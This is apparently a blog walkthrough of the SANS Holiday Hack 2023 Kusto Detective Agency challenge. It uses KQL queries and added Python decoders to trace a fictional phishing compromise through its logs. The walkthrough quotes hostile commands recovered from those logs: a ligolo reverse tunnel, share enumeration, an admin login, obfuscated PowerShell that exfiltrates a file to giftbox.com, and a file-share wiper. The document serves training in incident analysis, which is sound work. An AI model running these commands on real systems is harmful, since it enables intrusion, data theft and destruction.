Notes on Kusto Detective Agency, SANS Holiday Hack 2023

Posted at 2023-12-14

Kusto Detective Agency SANS Holiday Hack 2023

A challenge in which you work through a security-incident-style scenario by answering questions from the logs.

Onboarding: Welcome to SANS Holiday Hack 2023!

How many Craftperson Elf's are working from laptops?

I wondered what a "Craftperson Elf" is, but a look at the Employees table makes it clear.

Answer
Employees
| where role == "Craftsperson Elf"
| where hostname has "LAPTOP"
| count

Case 1: Welcome to Operation Giftwrap: Defending the Geese Island network

The alert says the user clicked the malicious link 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

What is the email address of the employee who received this phishing email?

What is the email address that was used to send this spear phishing email?

What was the subject line used in the spear phishing email?

Pretty much a direct lookup.

Answer
Email
| where link == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'

Case 2: Someone got phished! Let's dig deeper on the victim...

If the victim is someone important, our organization could be doomed! Hurry up, let's find out more about who was impacted!

What is the role of our victim in the organization?

What is the hostname of the victim's machine?

What is the source IP linked to the victim?

This one is also pretty much a direct lookup.

Answer
let recipientAddress = Email
| where link == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
| project recipient;
Employees
| where email_addr in(recipientAddress)

Case 3: That's not good. What happened next?

Use our various security log datasources to uncover more details about what happened to Alabaster.

What time did Alabaster click on the malicious link? Make sure to copy the exact timestamp from the logs!

What file is dropped to Alabaster's machine shortly after he downloads the malicious file?

Answer
OutboundNetworkEvents
| where url == 'http://madelvesnorthpole.org/published/search/MonthlyInvoiceForReindeerFood.docx'
| project timestamp
| extend binTimestamp = bin(timestamp,5m)
| join kind=inner( FileCreationEvents
| where hostname == "Y1US-DESKTOP"
| extend binTimestamp = bin(timestamp,5m)
) on binTimestamp
| where timestamp <= timestamp1
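The Case 3 query correlates the click with file creations by joining on bin(timestamp, 5m). That works when both events fall into the same 5-minute bin, but a file created a few seconds into the next bin is not joined at all. The Python below is an added example, not code from the post or the challenge: it reproduces the bin join and a plain time-window check over constructed OutboundNetworkEvents and FileCreationEvents rows (the click timestamp and hostname are the ones found in the writeup; the file names and the extra rows are placeholders I made up).

```python
"""Correlate a malicious-link click with files created on the same host shortly
afterwards: once the way Case 3 does it (join on 5-minute bins), once with a
plain time window. Added example; event rows below are constructed."""
from datetime import datetime, timedelta, timezone

HOST = "Y1US-DESKTOP"
MALICIOUS_URL = ("http://madelvesnorthpole.org/published/search/"
                 "MonthlyInvoiceForReindeerFood.docx")


def ts(s):
    """Parse an ISO-8601 UTC timestamp as written in the logs."""
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


# Constructed OutboundNetworkEvents rows (click time taken from the writeup).
OUTBOUND = [
    {"timestamp": ts("2023-12-02T10:14:21Z"), "hostname": HOST, "url": MALICIOUS_URL},
    {"timestamp": ts("2023-12-02T09:50:00Z"), "hostname": HOST, "url": "https://example.invalid/benign"},
]

# Constructed FileCreationEvents rows; file names are placeholders, not from the challenge.
FILE_CREATES = [
    {"timestamp": ts("2023-12-02T10:14:25Z"), "hostname": HOST, "filename": "MonthlyInvoiceForReindeerFood.docx"},
    {"timestamp": ts("2023-12-02T10:15:40Z"), "hostname": HOST, "filename": "PLACEHOLDER_dropped.exe"},
    {"timestamp": ts("2023-12-02T09:00:00Z"), "hostname": HOST, "filename": "unrelated_earlier.txt"},
    {"timestamp": ts("2023-12-02T11:30:00Z"), "hostname": HOST, "filename": "unrelated_later.txt"},
]


def bin_time(t, minutes=5):
    """Equivalent of KQL bin(timestamp, 5m): floor the timestamp to its bin start."""
    seconds = minutes * 60
    epoch = int(t.timestamp())
    return datetime.fromtimestamp(epoch - epoch % seconds, tz=timezone.utc)


def click_time(outbound, url):
    """Earliest request for the malicious URL (the 'exact timestamp' Case 3 asks for)."""
    return min(e["timestamp"] for e in outbound if e["url"] == url)


def files_by_bin_join(outbound, file_creates, url, host, minutes=5):
    """Case 3's approach: join on bin(timestamp, 5m), keep files created at or after the click."""
    click = click_time(outbound, url)
    click_bin = bin_time(click, minutes)
    return sorted(
        f["filename"] for f in file_creates
        if f["hostname"] == host
        and bin_time(f["timestamp"], minutes) == click_bin
        and f["timestamp"] >= click
    )


def files_by_window(outbound, file_creates, url, host, minutes=5):
    """Window check: files created within `minutes` after the click, whatever bin they land in."""
    click = click_time(outbound, url)
    end = click + timedelta(minutes=minutes)
    return sorted(
        f["filename"] for f in file_creates
        if f["hostname"] == host and click <= f["timestamp"] <= end
    )


if __name__ == "__main__":
    print("bin join   :", files_by_bin_join(OUTBOUND, FILE_CREATES, MALICIOUS_URL, HOST))
    print("time window:", files_by_window(OUTBOUND, FILE_CREATES, MALICIOUS_URL, HOST))
```

With these rows the click at 10:14:21 falls in the 10:10 bin while the second file creation at 10:15:40 falls in the 10:15 bin, so the bin join returns only the first file and the window check returns both. In KQL the same effect can be had by widening the bins or by joining on hostname and filtering on `timestamp1 between (timestamp .. timestamp + 5m)`.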

Case 4: A compromised host! Time for a deep dive.

Can you take a closer look at endpoint data from Alabaster's machine? We need to figure out exactly what happened here. Word of this hack is starting to spread to the other elves, so work quickly and quietly!

The attacker created a reverse tunnel connection with the compromised machine. What IP was the connection forwarded to?

What is the timestamp when the attackers enumerated network shares on the machine?

What was the hostname of the system the attacker moved laterally to?

Answer

First, look at the ProcessEvents from the Case 3 timestamp onwards.

ProcessEvents
| where hostname == "Y1US-DESKTOP"
| where timestamp >= datetime(2023-12-02T10:14:21Z)


One of them is clearly suspicious.

"ligolo" --bind 0.0.0.0:1251 --forward 127.0.0.1:3389 --to 113.37.9.17:22 --username rednose --password falalalala --no-antispoof

ligolo appears to be a port-forwarding tool.

https://github.com/sysdream/ligolo

That should answer Q1.

List the events that share the same parent_process_hash.

ProcessEvents
| where hostname == "Y1US-DESKTOP"
| where timestamp >= datetime(2023-12-02T10:14:21Z)
| where parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f"

Q2: what kind of command would be needed to enumerate network shares on the machine?


The net command can apparently do many things.

https://learn.microsoft.com/ja-jp/troubleshoot/windows-server/networking/net-commands-on-operating-systems

The results for parent_process_hash == "614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f" contain all sorts of things, but there are only 47 rows, so I checked for suspicious-looking ones by eye.

netstat
ipconfig
arp -a
netstat -an
nbtstat-n
net view /DOMAIN
net share
net use
net config
systeminfo
consent.exe 7196 426 0000028999E22E30
cmd.exe /C net use \\NorthPolefileshare\c$ /user:admin AdminPass123

Case 5: A hidden message

When was the attacker's first base64 encoded PowerShell command executed on Alabaster's machine?

What was the name of the file the attacker copied from the fileshare? (This might require some additional decoding)

The attacker has likely exfiltrated data from the file share. What domain name was the data exfiltrated to?

Answer

From the parent_process_hash in Case 4, the following three commands turn up.

2023-12-24T16:07:47Z	cmd.exe	614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f	C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn
2023-12-24T16:58:43Z	cmd.exe	614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f	C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4=
2023-12-25T10:44:27Z	cmd.exe	614ca7b627533e22aa3e5c3594605dc6fe6f000b0cc2b845ece47ca60673ec7f	C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ=

Base64-decode each of them.

print(base64_decode_tostring("KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn"))

> ( 'txt.tsiLeciNythguaN\potkseD\:C txt.tsiLeciNythguaN\lacitirCnoissiM\$c\erahselifeloPhtroN\\ metI-ypoC c- exe.llehsrewop' -split '' | %{$_[0]}) -join ''
print(base64_decode_tostring("W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4="))

> [StRiNg]::JoIn( '', [ChaR[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))|& ((gv '*MDr*').NamE[3,11,2]-joiN
print(base64_decode_tostring("QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ="))

> C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$

The first command looks like a reversed string. Running it as-is left it reversed, so I reversed it myself as follows.

[screenshot: the string literal reversed by hand]

Clean up the first half of the second command and run it.

[String]::JoIn( '', [Char[]](100, 111, 119, 110, 119, 105, 116, 104, 115, 97, 110, 116, 97, 46, 101, 120, 101, 32, 45, 101, 120, 102, 105, 108, 32, 67, 58, 92, 92, 68, 101, 115, 107, 116, 111, 112, 92, 92, 78, 97, 117, 103, 104, 116, 78, 105, 99, 101, 76, 105, 115, 116, 46, 100, 111, 99, 120, 32, 92, 92, 103, 105, 102, 116, 98, 111, 120, 46, 99, 111, 109, 92, 102, 105, 108, 101))

downwithsanta.exe -exfil C:\\Desktop\\NaughtNiceList.docx \\giftbox.com\file

[screenshot: output of the cleaned-up [Char[]] expression]
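As an added example (not part of the original post or of the challenge), here is a small Python decoder that performs the Case 5 steps in one pass: pull the -enc argument out of each process_commandline, base64-decode it, reverse the backwards string literal of the first command, and rebuild the second command from its [Char[]] code-point array. The three command lines are copied from the Case 5 ProcessEvents output above and embedded as constructed input; the regular expressions and function names are my own, not anything from the challenge.

```python
"""Decode the three base64-encoded PowerShell commands from Case 5 and unwind
the two obfuscation layers the writeup handles by hand. Added example; the
command lines are copied from the Case 5 rows and embedded as constructed input."""
import base64
import re

# Constructed input: the process_commandline values of the three Case 5 rows.
COMMAND_LINES = [
    r"C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc KCAndHh0LnRzaUxlY2lOeXRoZ3VhTlxwb3Rrc2VEXDpDIHR4dC50c2lMZWNpTnl0aGd1YU5cbGFjaXRpckNub2lzc2lNXCRjXGVyYWhzZWxpZmVsb1BodHJvTlxcIG1ldEkteXBvQyBjLSBleGUubGxlaHNyZXdvcCcgLXNwbGl0ICcnIHwgJXskX1swXX0pIC1qb2luICcn",
    r"C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc W1N0UmlOZ106OkpvSW4oICcnLCBbQ2hhUltdXSgxMDAsIDExMSwgMTE5LCAxMTAsIDExOSwgMTA1LCAxMTYsIDEwNCwgMTE1LCA5NywgMTEwLCAxMTYsIDk3LCA0NiwgMTAxLCAxMjAsIDEwMSwgMzIsIDQ1LCAxMDEsIDEyMCwgMTAyLCAxMDUsIDEwOCwgMzIsIDY3LCA1OCwgOTIsIDkyLCA2OCwgMTAxLCAxMTUsIDEwNywgMTE2LCAxMTEsIDExMiwgOTIsIDkyLCA3OCwgOTcsIDExNywgMTAzLCAxMDQsIDExNiwgNzgsIDEwNSwgOTksIDEwMSwgNzYsIDEwNSwgMTE1LCAxMTYsIDQ2LCAxMDAsIDExMSwgOTksIDEyMCwgMzIsIDkyLCA5MiwgMTAzLCAxMDUsIDEwMiwgMTE2LCA5OCwgMTExLCAxMjAsIDQ2LCA5OSwgMTExLCAxMDksIDkyLCAxMDIsIDEwNSwgMTA4LCAxMDEpKXwmICgoZ3YgJypNRHIqJykuTmFtRVszLDExLDJdLWpvaU4=",
    r"C:\Windows\System32\powershell.exe -Nop -ExecutionPolicy bypass -enc QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ=",
]

# The base64 blob following -enc (PowerShell accepts abbreviated switch names).
ENC_RE = re.compile(r"-enc\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Layer 1: a string literal written backwards and wrapped in a -split/-join
# pipeline. The pipeline does not reverse anything when run (the writeup saw the
# text stay reversed), so the literal itself is what has to be reversed.
REVERSED_LITERAL_RE = re.compile(
    r"^\(\s*'([^']*)'\s*-split\s*''\s*\|\s*%\{\$_\[0\]\}\s*\)\s*-join\s*''\s*$"
)

# Layer 2: the command assembled from a [Char[]] array of decimal code points.
CHAR_ARRAY_RE = re.compile(r"\[char\[\]\]\(\s*([\d,\s]+?)\s*\)", re.IGNORECASE)


def extract_encoded(cmdline):
    """Return the base64 argument of -enc, or None if the line has none."""
    m = ENC_RE.search(cmdline)
    return m.group(1) if m else None


def decode_enc(b64):
    """Base64-decode an -enc payload to text.

    A real -EncodedCommand payload is UTF-16LE; the challenge data is plain
    ASCII. Tell them apart by the NUL high byte of the second octet."""
    raw = base64.b64decode(b64)
    if len(raw) >= 2 and raw[1] == 0:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def deobfuscate(decoded):
    """Return (layer_name, recovered_command) for one decoded payload."""
    m = REVERSED_LITERAL_RE.match(decoded)
    if m:
        return "reversed-literal", m.group(1)[::-1]
    m = CHAR_ARRAY_RE.search(decoded)
    if m:
        text = "".join(chr(int(n)) for n in m.group(1).split(","))
        return "char-array", text
    return "plain", decoded


def analyse(command_lines):
    """Decode every -enc command line and unwind its obfuscation layer."""
    results = []
    for cmdline in command_lines:
        b64 = extract_encoded(cmdline)
        if b64 is None:
            continue
        results.append(deobfuscate(decode_enc(b64)))
    return results


if __name__ == "__main__":
    for layer, cmd in analyse(COMMAND_LINES):
        print(f"[{layer}] {cmd}")
```

The decoder answers all three Case 5 questions at once: the first recovered command copies NaughtyNiceList.txt from the file share, the second names the exfiltration target giftbox.com, and the third is the wiper command that Case 6 asks about. In the second payload the trailing `(gv '*MDr*').NamE[3,11,2]-joiN` builds the name `iex` (Invoke-Expression) from characters 3, 11 and 2 of the `MaximumDriveCount` variable, so the assembled text, not the wrapper, is the command to record in the timeline.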

Case 6: The final step!

We know that the attackers stole Santa's naughty or nice list. What else happened? Can you find the final malicious command the attacker ran?

What is the name of the executable the attackers used in the final malicious command?

What was the command line flag used alongside this executable?

This was already seen in the third command of Case 5.

Answer
print(base64_decode_tostring("QzpcV2luZG93c1xTeXN0ZW0zMlxkb3dud2l0aHNhbnRhLmV4ZSAtLXdpcGVhbGwgXFxcXE5vcnRoUG9sZWZpbGVzaGFyZVxcYyQ="))

> C:\Windows\System32\downwithsanta.exe --wipeall \\\\NorthPolefileshare\\c$